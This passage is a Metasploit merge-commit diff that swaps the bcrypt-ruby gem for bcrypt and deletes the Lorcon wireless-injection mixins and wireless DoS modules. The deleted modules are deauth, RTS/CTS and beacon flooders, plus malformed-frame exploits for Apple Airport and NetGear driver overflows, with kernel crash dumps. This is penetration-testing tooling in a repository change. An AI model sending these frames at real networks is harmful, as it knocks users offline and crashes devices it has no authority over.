Merge branch 'staging/electro_release' into feature/ssh_login_scanner

bug/bundler_fix
David Maloney 2014-04-21 19:26:49 -05:00
commit 7d05de935e
29 changed files with 13 additions and 2982 deletions

View File

@ -3,7 +3,7 @@ source 'https://rubygems.org'
# Need 3+ for ActiveSupport::Concern # Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0' gem 'activesupport', '>= 3.0.0'
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
gem 'bcrypt-ruby' gem 'bcrypt'
# Needed for some admin modules (scrutinizer_add_user.rb) # Needed for some admin modules (scrutinizer_add_user.rb)
gem 'json' gem 'json'
# Needed by msfgui and other rpc components # Needed by msfgui and other rpc components

View File

@ -13,7 +13,7 @@ GEM
i18n (~> 0.6, >= 0.6.4) i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0) multi_json (~> 1.0)
arel (3.0.2) arel (3.0.2)
bcrypt-ruby (3.1.2) bcrypt (3.1.7)
builder (3.0.4) builder (3.0.4)
database_cleaner (1.1.1) database_cleaner (1.1.1)
diff-lcs (1.2.4) diff-lcs (1.2.4)
@ -63,7 +63,7 @@ PLATFORMS
DEPENDENCIES DEPENDENCIES
activerecord activerecord
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
bcrypt-ruby bcrypt
database_cleaner database_cleaner
factory_girl (>= 4.1.0) factory_girl (>= 4.1.0)
fivemat (= 1.2.1) fivemat (= 1.2.1)

View File

@ -176,7 +176,7 @@ Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT License: MIT
Files: bcrypt-ruby Files: bcrypt
Copyright: 2007-2011 Coda Hale Copyright: 2007-2011 Coda Hale
License: MIT License: MIT

View File

@ -1,127 +0,0 @@
# -*- coding: binary -*-
module Msf
###
#
# This module provides methods for sending raw 802.11 frames using the ruby-lorcon extension.
# Please see the ruby-lorcon documentation for more information.
#
###
module Exploit::Lorcon
#
# Initializes an instance of an exploit module that accesses a 802.11 network
#
def initialize(info = {})
super
default_intf = 'ath0'
default_driver = 'madwifing'
if (Rex::Compat.is_windows())
# Default to the the first airpcap device on Windows
default_intf = "\\\\.\\airpcap00"
# Default to the airpcap driver on Windows
default_driver = 'airpcap'
end
register_options(
[
OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]),
OptString.new('DRIVER', [true, 'The name of the wireless driver for lorcon', default_driver]),
OptInt.new('CHANNEL', [true, 'The default channel number', 11]),
OptInt.new('TXRATE', [true, 'The injected transmit rate', 2]),
OptEnum.new('TXMOD', [true, 'The injected modulation type', 'DSSS', %w{DEFAULT FHSS DSSS OFDM TURBO MIMO MIMOGF}])
], Msf::Exploit::Lorcon
)
begin
if(Rex::Compat.is_windows())
airpcap = Rex::FileUtils.find_full_path("airpcap.dll")
if (not airpcap)
raise RuntimeError, "The airpcap.dll library must be installed"
end
end
require 'Lorcon'
@lorcon_loaded = true
rescue ::Exception => e
@lorcon_loaded = false
@lorcon_error = e
end
end
#
# Opens a handle to the specified wireless device
#
def open_wifi
if (not @lorcon_loaded)
print_status("The Lorcon module is not available: #{@lorcon_error}")
raise RuntimeError, "Lorcon not available"
end
# XXX: Force the interface to be up
system("ifconfig", datastore['INTERFACE'], "up")
self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'], datastore['DRIVER'])
if (not self.wifi)
raise RuntimeError, "Could not open the wireless device interface"
end
# Configure the card for reliable injection
self.wifi.fmode = "INJECT"
self.wifi.channel = (datastore['CHANNEL'] || 11).to_i
# Configure modulation
begin
self.wifi.modulation = datastore['TXMOD']
rescue ::ArgumentError => e
print_status("Warning: #{e}")
end
# Configure the transmission rate
begin
self.wifi.txrate = datastore['TXRATE'].to_i if datastore['TXRATE']
rescue ::ArgumentError => e
print_status("Warning: #{e}")
end
self.wifi
end
def close_wifi
self.wifi = nil
end
#
# Converts ethernet addresses to binary
#
def eton(addr)
addr.split(':').map { |c| c.hex.chr }.join
end
def channel
self.wifi.channel
end
def next_channel
cur = self.wifi.channel
nxt = (cur > 10) ? 1 : cur + 1
self.wifi.channel = nxt
end
attr_accessor :wifi
end
end

View File

@ -1,141 +0,0 @@
# -*- coding: binary -*-
module Msf
###
#
# This module provides methods for sending raw 802.11 frames using the
# ruby-lorco2n extension.
# Please see the ruby-lorcon documentation for more information.
#
###
module Exploit::Lorcon2
#
# Initializes an instance of an exploit module that accesses a 802.11 network
#
def initialize(info = {})
super
default_intf = 'wlan0'
default_driver = 'autodetect'
if (Rex::Compat.is_windows())
# Default to the the first airpcap device on Windows
default_intf = "\\\\.\\airpcap00"
# Default to the airpcap driver on Windows
default_driver = 'airpcap'
end
register_options(
[
OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]),
OptString.new('DRIVER', [true, 'The name of the wireless driver for lorcon', default_driver]),
OptInt.new('CHANNEL', [true, 'The initial channel', 11]),
], Msf::Exploit::Lorcon2
)
begin
if(Rex::Compat.is_windows())
airpcap = Rex::FileUtils.find_full_path("airpcap.dll")
if (not airpcap)
raise RuntimeError, "The airpcap.dll library must be installed"
end
end
require 'Lorcon2'
@lorcon_loaded = true
rescue ::Exception => e
@lorcon_loaded = false
@lorcon_error = e
end
end
#
# Opens a handle to the specified wireless device
#
def open_wifi
if (not @lorcon_loaded)
print_status("The Lorcon2 module is not available: #{@lorcon_error}")
raise RuntimeError, "Lorcon2 not available"
end
if (datastore['DRIVER'] == "autodetect")
self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'])
else
self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'], datastore['DRIVER'])
end
if (not self.wifi)
raise RuntimeError, "Could not initialize the wireless device interface"
end
# Configure for injmon
self.wifi.openinjmon() or raise RuntimeError, "Could not open device in inject/monitor combo mode: " + self.wifi.error
# Configure channel
self.wifi.channel = datastore['CHANNEL']
# TODO - add mod/rate once lorcon2 supports it
self.wifi
end
#
# This monstrosity works around a series of bugs in the interrupt
# signal handling of Ruby 1.9 and Lorcon2
#
def each_packet(count=-1)
return if not wifi
begin
@wifi_count = 0
reader = framework.threads.spawn("Lorcon2Receiver", false) do
wifi.each_packet(count.to_i) do |pkt|
yield(pkt)
@wifi_count += 1
end
end
reader.join
rescue ::Exception
raise $!
ensure
reader.kill if reader.alive?
end
@wifi_count
end
def close_wifi
self.wifi = nil
end
#
# Converts ethernet addresses to binary
#
def eton(addr)
addr.split(':').map { |c| c.hex.chr }.join
end
def channel
self.wifi.channel
end
def next_channel
cur = self.wifi.channel
nxt = (cur > 10) ? 1 : cur + 1
self.wifi.channel = nxt
end
attr_accessor :wifi
end
end

View File

@ -71,8 +71,6 @@ require 'msf/core/exploit/dialup'
require 'msf/core/exploit/dect_coa' require 'msf/core/exploit/dect_coa'
# Networks # Networks
require 'msf/core/exploit/lorcon'
require 'msf/core/exploit/lorcon2'
require 'msf/core/exploit/capture' require 'msf/core/exploit/capture'
# FileFormat # FileFormat

View File

@ -1,162 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
'Description' => %q{
The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
that does not contain valid information element (IE) fields after the fixed-length header. The data
following the fixed-length header is copied over internal kernel structures, resulting in memory
operations being performed on attacker-controlled pointer values.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-5710'],
['OSVDB', '30180'],
]
))
register_options(
[
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
end
#
# This bug is easiest to trigger when the card has been placed into active scan mode:
# $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000
#
def run
open_wifi
cnt = datastore['COUNT'].to_i
print_status("Creating malicious probe response frame...")
frame = create_frame()
print_status("Sending #{cnt} frames...")
cnt.times { wifi.write(frame) }
end
def create_frame
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
caps = [rand(65535)].pack('n')
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) # capabilities
frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
return frame
end
end
=begin
Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006)
Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260
Latest crash info for cpu 0:
Exception state (sv=0x3AA12A00)
PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access)
Backtrace: 0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 0x002CFA5C 0x000A9314
Kernel loadable modules in backtrace (with dependencies):
com.apple.driver.AppleAirPort(3.4.4)@0x797000
dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000
Proceeding back via exception chain:
Exception state (sv=0x3AA12A00)
previously dumped as "Latest" state. skipping...
Exception state (sv=0x31F13A00)
PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown)
Kernel version:
Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC
(gdb) showcurrentstacks
task vm_map ipc_space #acts pid proc command
0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task
activation thread pri state wait_queue wait_event
0x01a7c000 0x01a7c000 82 R
reserved_stack=0x173b0000
kernel_stack=0x17440000
stacktop=0x17443b60
0x17443b60 0x1bc80ac
0x17443be0 0x7a1d48 <com.apple.driver.AppleAirPort + 0xad48>
0x17443c60 0x79fa54 <com.apple.driver.AppleAirPort + 0x8a54>
0x17443ce0 0x79ff94 <com.apple.driver.AppleAirPort + 0x8f94>
0x17443d90 0x79febc <com.apple.driver.AppleAirPort + 0x8ebc>
0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184>
0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104>
0x17443e90 0xa9314 <Call_continuation+20>
stackbottom=0x17443e90
(gdb) x/3i $pc
0x7a2260 <mhp.1762+3571640>: lbz r8,0(r2)
0x7a2264 <mhp.1762+3571644>: addi r2,r2,1
0x7a2268 <mhp.1762+3571648>: stw r2,0(r11)
(gdb) i r $r2
r2 0xdefacf7 233811191
(gdb) x/x $r11
0x17443bb8: 0x0defacf7
(gdb) bt
#0 0x007a2260 in mhp.1762 ()
#1 0x007a1d48 in mhp.1762 ()
warning: Previous frame identical to this frame (corrupt stack?)
#2 0x007a1d48 in mhp.1762 ()
#3 0x0079fa54 in mhp.1762 ()
#4 0x0079ff94 in mhp.1762 ()
#5 0x0079febc in mhp.1762 ()
#6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196
#7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267
(gdb) x/40x $r1
0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038
0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210
0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000
0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4
0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7
0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001
0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000
0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40
0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000
0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e
=end

View File

@ -1,78 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless CTS/RTS Flooder',
'Description' => %q{
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
using the specified source address,
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]),
OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']),
OptInt.new('NUM',[true, "Number of frames to send",100])
],self.class)
end
def run
case datastore['TYPE'].upcase
when 'RTS'
if (!datastore['ADDR_SRC'])
print_error("FAILED: RTS Flood selected but ADDR_SRC not set!")
return
end
frame = create_rts()
when 'CTS'
frame = create_cts()
else
print_error("No TYPE selected!!")
return
end
open_wifi
print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....")
datastore['NUM'].to_i.times do
wifi.write(frame)
end
end
def create_rts
frame =
"\xb4" + # Type/SubType
"\x00" + # Flags
"\xff\x7f" + # Duration
eton(datastore['ADDR_DST']) + # dst addr
eton(datastore['ADDR_SRC']) # src addr
return frame
end
def create_cts
frame =
"\xc4" + # Type/SubType
"\x00" + # Flags
"\xff\x7f" + # Duration
eton(datastore['ADDR_DST']) # dst addr
return frame
end
end

View File

@ -1,65 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless DEAUTH Flooder',
'Description' => %q{
This module sends 802.11 DEAUTH requests to a specific wireless peer,
using the specified source address and source BSSID.
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]),
OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]),
OptInt.new('NUM',[true, "Number of frames to send",100])
],self.class)
end
def run
print_status("Creating Deauth frame with the following attributes:")
print_status("\tDST: #{datastore['ADDR_DST']}")
print_status("\tSRC: #{datastore['ADDR_SRC']}")
print_status("\tBSSID: #{datastore['ADDR_BSS']}")
open_wifi
print_status("Sending #{datastore['NUM']} frames.....")
datastore['NUM'].to_i.times do
wifi.write(create_deauth())
end
close_wifi
end
def create_deauth
seq = [rand(255)].pack('n')
frame =
"\xc0" + # Type/SubType
"\x00" + # Flags
"\x3a\x01" + # Duration
eton(datastore['ADDR_DST']) + # dst addr
eton(datastore['ADDR_SRC']) + # src addr
eton(datastore['ADDR_BSS']) + # BSSID
seq + # sequence number
"\x07\x00" # Reason Code (nonassoc. sta)
return frame
end
end

View File

@ -1,90 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Fake Access Point Beacon Flood',
'Description' => %q{
This module can advertise thousands of fake access
points, using random SSIDs and BSSID addresses. Inspired
by Black Alchemy's fakeap tool.
},
'Author' => [ 'hdm', 'kris katterjohn' ],
'License' => MSF_LICENSE
))
register_options([
OptInt.new('NUM', [false, "Number of beacons to send"]),
OptString.new('BSSID', [false, "Use this static BSSID (e.g. AA:BB:CC:DD:EE:FF)"]),
OptString.new('SSID', [false, "Use this static SSID"])
])
end
def run
open_wifi
print_status("Sending fake beacon frames...")
if datastore['NUM'].nil? or datastore['NUM'] == 0
wifi.write(create_frame()) while true
else
datastore['NUM'].times { wifi.write(create_frame()) }
end
end
def create_frame
ssid = datastore['SSID'] || Rex::Text.rand_text_alpha(rand(31)+1)
if datastore['BSSID']
bssid = eton(datastore['BSSID'])
else
bssid = Rex::Text.rand_text(6)
end
seq = [rand(255)].pack('n')
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x00\x05" + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +
# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# current channel
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
# traffic indication map
"\x05" + "\x04" + "\x00\x01\x02\x20" +
# country information
"\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" +
# erp information
"\x2a" + "\x01" + "\x00" +
# extended supported rates
"\x32" + "\x04" + "\x12\x24\x60\x6c"
end
end

View File

@ -1,110 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Frame (File) Injector',
'Description' => %q{
Inspired by Josh Wright's file2air, this module writes
wireless frames from a binary file to the air, allowing
you to substitute some addresses before it gets sent.
Unlike the original file2air (currently v1.1), this module
*does* take into account the ToDS and FromDS flags in the
frame when replacing any specified addresses.
},
# 11/03/2008
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE
))
register_options([
OptString.new('FILE', [true, 'Filename to write to the air']),
OptString.new('ADDR_DST', [false, 'Target MAC (e.g. 00:DE:AD:BE:EF:00)']),
OptString.new('ADDR_SRC', [false, 'Source MAC (e.g. 00:DE:AD:BE:EF:00)']),
OptString.new('BSSID', [false, 'BSSID (e.g. 00:DE:AD:BE:EF:00)']),
OptInt.new('NUM', [true, 'Number of frames to send', 1])
], self.class)
end
def run
begin
frame = File.read(datastore['FILE'])
rescue ::Exception
print_status("Couldn't read from \"#{datastore['FILE']}\": #{$!}")
return
end
# Sending too much data can cause local problems, even if it's
# less than the 802.11 MTU. Gotta draw the line somewhere.
if frame.length < 10 or frame.length > 1800
print_status("Invalid frame size (should be 10-1800 bytes)")
return
end
if datastore['BSSID'] or datastore['ADDR_DST'] or datastore['ADDR_SRC']
if not substaddrs(frame)
print_status("This module doesn't support modifying frames with both ToDS and FromDS set")
return
end
end
open_wifi
print_status("Writing out #{datastore['NUM']} frames...")
datastore['NUM'].times do
wifi.write(frame)
end
close_wifi
end
def substaddrs(frame)
tods = (frame[1] & 1) == 1
fromds = (frame[1] & 2) == 2
if tods
if fromds
# Not going to handle this 4-address special-case
return nil
else
substaddr1(frame, datastore['BSSID'])
substaddr2(frame, datastore['ADDR_SRC'])
substaddr3(frame, datastore['ADDR_DST'])
end
else
if fromds
substaddr1(frame, datastore['ADDR_DST'])
substaddr2(frame, datastore['BSSID'])
substaddr3(frame, datastore['ADDR_SRC'])
else
substaddr1(frame, datastore['ADDR_DST'])
substaddr2(frame, datastore['ADDR_SRC'])
substaddr3(frame, datastore['BSSID'])
end
end
true
end
def substaddr1(frame, addr)
frame[4,6] = eton(addr) if addr
end
def substaddr2(frame, addr)
frame[10,6] = eton(addr) if addr
end
def substaddr3(frame, addr)
frame[16,6] = eton(addr) if addr
end
end

View File

@ -1,118 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
'Description' => %q{
This module exploits a buffer overflow in the NetGear MA521 wireless device
driver under Windows XP. When a specific malformed frame (beacon or probe response)
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
driver attempts to write to an attacker-controlled memory location. The vulnerability
is triggered by an invalid supported rates information element.
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
NetGear MA521 Cardbus adapter. A remote code execution module is also in development.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-6059'],
['OSVDB', '30507'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
]
))
register_options(
[
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
], self.class)
end
def run
open_wifi
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Creating malicious beacon frame...")
frame = create_beacon()
print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(frame)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
end
print_status("Completed sending #{count} beacons.")
end
def create_beacon
ssid = Rex::Text.rand_text(6)
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
# ssid IE
"\x00" + ssid.length.chr + ssid +
# supported rates IE overflow
"\x01" + "\xFF" + ("\x41" * 255) +
# channel IE
"\x03" + "\x01" + channel.chr
return frame
end
end
=begin
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high. This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: 41414141, memory referenced
Arg2: 00000002, IRQL
Arg3: 00000000, value 0 = read operation, 1 = write operation
Arg4: aa1ec75a, address which referenced memory
=end

View File

@ -1,116 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow',
'Description' => %q{
This module exploits a buffer overflow in the NetGear WG311v1 wireless device
driver under Windows XP and 2000. A kernel-mode heap overflow occurs
when malformed probe response frame is received that contains a long SSID field
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
NetGear WG311v1 PCI card. A remote code execution module is also in development.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-6125'],
['OSVDB', '30511'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
]
))
register_options(
[
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
end
def run
open_wifi
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Creating malicious probe response frame...")
frame = create_probe_response()
print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(frame)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
end
print_status("Completed sending #{count} probe responses.")
end
def create_probe_response
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
# SSID IE overflow
"\x00" + "\xff" + ("\x41" * 255) +
# supported rates IE
"\x01" + "\x08" + "\x02\x04\x0b\x16\x0c\x18\x30\x48" +
# channel IE
"\x03" + "\x01" + channel.chr
return frame
end
end
=begin
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 81cae7b0, The pool entry we were looking for within the page.
Arg3: 81cae8c8, The next pool entry.
Arg4: 0a23002b, (reserved)
=end

View File

@ -1,74 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response',
'Description' => %q{
This module exploits a firmware-level vulnerability in a variety of
802.11b devices. This attack works by sending a probe response frame
containing a NULL SSID information element to an affected device. This
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
Orinoco, and the first generation of Airport cards).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'],
['WVE', '2006-0064']
]
))
register_options(
[
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
end
def run
open_wifi
cnt = datastore['COUNT'].to_i
print_status("Creating malicious probe response frame...")
frame = create_frame()
print_status("Sending #{cnt} frames...")
cnt.times { wifi.write(frame) }
end
def create_frame
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
caps = [rand(65535)].pack('n')
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) + # capabilities
[0, 0].pack('CC') # Type=SSID(0) Length=0
return frame
end
end

View File

@ -1,108 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Beacon SSID Emulator',
'Description' => %q{
This module sends out beacon frames using SSID's identified in a
specified file and randomly selected BSSID's. This is useful when
combined with a Karmetasploit attack to get clients configured to
not probe for networks in their PNL to start probing when they see a
matching SSID in from this script. For a list of common SSID's to
use with this script, check http://www.wigle.net/gps/gps/main/ssidstats.
If a file of SSID's is not specified, a default list of 20 SSID's will
be used. This script will run indefinitely until interrupted.
},
'Author' => [ 'joswr1ght', 'hdm' ],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('SSIDS_FILE', [ false, "Filename of SSID's to broadcast, one per line"])
], self.class)
end
def run
@@uni = 0
frames = []
open_wifi
ssidlist = []
if datastore['SSIDS_FILE']
begin
ssidfile = File.new(datastore['SSIDS_FILE'], "r")
rescue ::Exception
print_status("Couldn't read from \"#{datastore['SSIDS_FILE']}\": #{$!}")
return
end
ssidfile.each_line do |line|
ssidlist.push line.chomp
end
else
ssidlist = ["linksys", "default", "NETGEAR", "Belkin54g", "Wireless",
"WLAN", "home", "DLINK", "smc", "tsunami", "tmobile", "101", "panera",
"hhonors", "GlobalSuiteWireless", "Internet", "WiFi", "public", "guest",
"test"]
end
print_status("Sending beacon frames...")
while (true)
ssidlist.each do |ssid|
#print_status("Sending frame for SSID #{ssid}")
frame = create_frame(ssid)
wifi.write(frame)
end
end
end
def create_frame(ssid)
mtu = 1500 # 2312 # 1514
ies = rand(1024)
bssid = "0" + ssid[0..4]
seq = [rand(255)].pack('n')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
bssid + # src
bssid + # bssid
